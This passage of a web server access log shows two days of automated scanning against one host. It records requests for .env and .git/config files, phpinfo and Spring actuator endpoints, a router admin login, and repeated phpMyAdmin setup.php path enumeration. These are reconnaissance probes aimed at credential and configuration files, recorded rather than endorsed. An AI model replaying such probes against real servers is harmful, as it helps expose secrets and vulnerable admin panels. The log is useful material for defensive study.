[24/Dec/2023:04:07:59 -0600] "GET stager64 HTTP/1.1" 400 486 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" 185.91.69.110 - - [24/Dec/2023:04:08:00 -0600] "GET /a HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" 185.91.69.110 - - [24/Dec/2023:04:08:00 -0600] "GET /download/file.ext HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" 185.91.69.110 - - [24/Dec/2023:04:08:00 -0600] "GET /SiteLoader HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" 185.91.69.110 - - [24/Dec/2023:04:08:01 -0600] "GET /mPlayer HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" 185.91.69.110 - - [24/Dec/2023:04:08:01 -0600] "POST / HTTP/1.1" 400 486 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"

165.22.221.10 - - [24/Dec/2023:04:16:19 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

94.102.61.10 - - [24/Dec/2023:04:56:28 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

65.49.20.66 - - [24/Dec/2023:05:06:25 -0600] "\x16\x03\x01" 400 0 "-" "-"

20.0.145.106 - - [24/Dec/2023:05:08:57 -0600] "GET //.env HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

185.224.128.191 - - [24/Dec/2023:05:45:07 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

84.54.51.108 - - [24/Dec/2023:06:59:41 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"

209.191.192.102 - - [24/Dec/2023:07:00:14 -0600] "GET / HTTP/1.1" 200 297 "http://67.218.15.8/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 209.191.192.102 - - [24/Dec/2023:07:00:14 -0600] "GET /favicon.ico HTTP/1.1" 404 490 "http://67.218.15.25/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

216.218.206.66 - - [24/Dec/2023:08:06:02 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0" 216.218.206.66 - - [24/Dec/2023:08:07:35 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0" 216.218.206.66 - - [24/Dec/2023:08:08:43 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0"

91.221.218.25 - - [24/Dec/2023:08:08:53 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

170.64.154.53 - - [24/Dec/2023:08:13:07 -0600] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x" 170.64.154.53 - - [24/Dec/2023:08:13:08 -0600] "GET /Pages/log/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

54.242.10.112 - - [24/Dec/2023:09:19:12 -0600] "GET /robots.txt HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

167.94.146.58 - - [24/Dec/2023:09:25:21 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.146.58 - - [24/Dec/2023:09:25:24 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.146.58 - - [24/Dec/2023:09:25:25 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.146.58 - - [24/Dec/2023:09:25:25 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

198.199.105.95 - - [24/Dec/2023:10:04:49 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

45.227.254.48 - - [24/Dec/2023:10:40:15 -0600] "\x03" 400 0 "-" "-"

198.199.95.66 - - [24/Dec/2023:11:47:01 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

84.54.51.80 - - [24/Dec/2023:12:31:40 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

87.236.176.96 - - [24/Dec/2023:13:21:45 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"

185.224.128.191 - - [24/Dec/2023:13:23:34 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

205.210.31.146 - - [24/Dec/2023:14:16:28 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

107.21.189.55 - - [24/Dec/2023:14:24:14 -0600] "GET /aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

185.161.248.148 - - [24/Dec/2023:14:25:36 -0600] "\x03" 400 0 "-" "-"

20.150.201.61 - - [24/Dec/2023:15:10:38 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 20.150.201.61 - - [24/Dec/2023:15:10:39 -0600] "GET /api/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 20.150.201.61 - - [24/Dec/2023:15:10:39 -0600] "GET /laravel/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"

83.97.73.87 - - [24/Dec/2023:15:38:11 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

170.64.158.202 - - [24/Dec/2023:15:51:21 -0600] "GET /.git/config HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

188.215.235.123 - - [24/Dec/2023:15:53:52 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 188.215.235.123 - - [24/Dec/2023:15:53:53 -0600] "POST / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"

83.97.73.87 - - [24/Dec/2023:16:58:36 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

177.155.134.167 - - [24/Dec/2023:17:06:34 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"

45.81.34.200 - - [24/Dec/2023:17:16:23 -0600] "GET / HTTP/1.1" 200 241 "http://67.218.15.25" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" 45.81.34.200 - - [24/Dec/2023:17:16:27 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 45.81.34.200 - - [24/Dec/2023:17:16:32 -0600] "GET / HTTP/1.1" 200 241 "http://67.218.15.25" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" 45.81.34.200 - - [24/Dec/2023:17:16:36 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"

167.94.145.56 - - [24/Dec/2023:18:06:38 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.145.56 - - [24/Dec/2023:18:06:43 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.56 - - [24/Dec/2023:18:06:43 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.145.56 - - [24/Dec/2023:18:06:43 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

20.150.201.61 - - [24/Dec/2023:18:25:02 -0600] "GET /_profiler/phpinfo HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 20.150.201.61 - - [24/Dec/2023:19:11:22 -0600] "GET /_profiler/phpinfo HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"

78.153.140.221 - - [24/Dec/2023:19:34:55 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.221 - - [24/Dec/2023:19:34:55 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

34.210.255.132 - - [24/Dec/2023:19:41:29 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"

71.6.134.234 - - [24/Dec/2023:20:27:34 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"

198.235.24.199 - - [24/Dec/2023:20:33:06 -0600] "\x16\x03\x01" 400 0 "-" "-" 198.235.24.199 - - [24/Dec/2023:20:33:07 -0600] "\x16\x03\x01" 400 0 "-" "-"

71.6.134.234 - - [24/Dec/2023:20:43:55 -0600] "\x16\x03\x01" 400 0 "-" "-"

71.6.232.20 - - [24/Dec/2023:20:51:21 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"

34.79.162.186 - - [24/Dec/2023:21:17:21 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

64.62.197.208 - - [24/Dec/2023:21:43:09 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 64.62.197.205 - - [24/Dec/2023:21:45:19 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.62.197.203 - - [24/Dec/2023:21:46:03 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 64.62.197.161 - - [24/Dec/2023:21:54:53 -0600] "\x16\x03\x01" 400 0 "-" "-"

193.106.29.122 - - [24/Dec/2023:22:20:03 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0"

45.182.230.216 - - [24/Dec/2023:22:29:44 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

185.224.128.191 - - [24/Dec/2023:23:14:10 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

December 25, 2023

162.216.150.193 - - [25/Dec/2023:00:51:55 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

185.224.128.191 - - [25/Dec/2023:01:49:22 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

120.71.1.48 - - [25/Dec/2023:02:14:41 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:41 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:42 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:42 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:43 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:43 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:44 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:44 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:52 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:52 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:14:53 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:00 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:01 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:01 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:02 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:02 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:03 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:08 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:09 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:18 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:19 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:19 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:26 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:27 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:28 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:29 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:29 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:30 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:30 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:31 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:32 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:33 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:37 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:37 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:38 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:38 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:39 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:39 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:55 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:57 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:57 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:15:58 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:16:06 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 120.71.1.48 - - [25/Dec/2023:02:16:06 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

34.65.73.112 - - [25/Dec/2023:03:52:02 -0600] "\x16\x03\x01" 400 0 "-" "-" 34.65.73.112 - - [25/Dec/2023:03:52:04 -0600] "OPTIONS / HTTP/1.0" 200 181 "-" "-"

185.224.128.191 - - [25/Dec/2023:04:25:27 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

165.154.118.169 - - [25/Dec/2023:04:27:31 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 8_2_2; Win64; x64) AppleWebKit/546.50 (KHTML, like Gecko) Chrome/66.0.2123 Safari/537.36" 165.154.118.169 - - [25/Dec/2023:04:27:32 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 7_0_1; Win64; x64) AppleWebKit/595.53 (KHTML, like Gecko) Chrome/78.0.929 Safari/537.36" 165.154.118.169 - - [25/Dec/2023:04:27:32 -0600] "GET /sitemap.xml HTTP/1.1" 404 454 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/589.54 (KHTML, like Gecko) Chrome/92.0.2290 Safari/537.36" 165.154.118.169 - - [25/Dec/2023:04:27:32 -0600] "GET /robots.txt HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 9_1_1; Win64; x64) AppleWebKit/547.48 (KHTML, like Gecko) Chrome/102.0.1400 Safari/537.36" 165.154.118.169 - - [25/Dec/2023:04:27:33 -0600] "GET /axis2-admin/ HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 165.154.118.169 - - [25/Dec/2023:04:27:34 -0600] "GET /axis2/ HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 165.154.118.169 - - [25/Dec/2023:04:27:34 -0600] "GET /axis2/axis2-admin/ HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"

42.192.53.183 - - [25/Dec/2023:04:38:08 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:08 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:09 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:09 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:10 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:11 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:11 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:12 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:12 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:13 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:13 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:14 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:14 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:15 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:15 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:16 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:16 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:17 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:17 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:18 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:18 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:19 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:19 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:19 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:20 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:20 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:21 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:21 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php 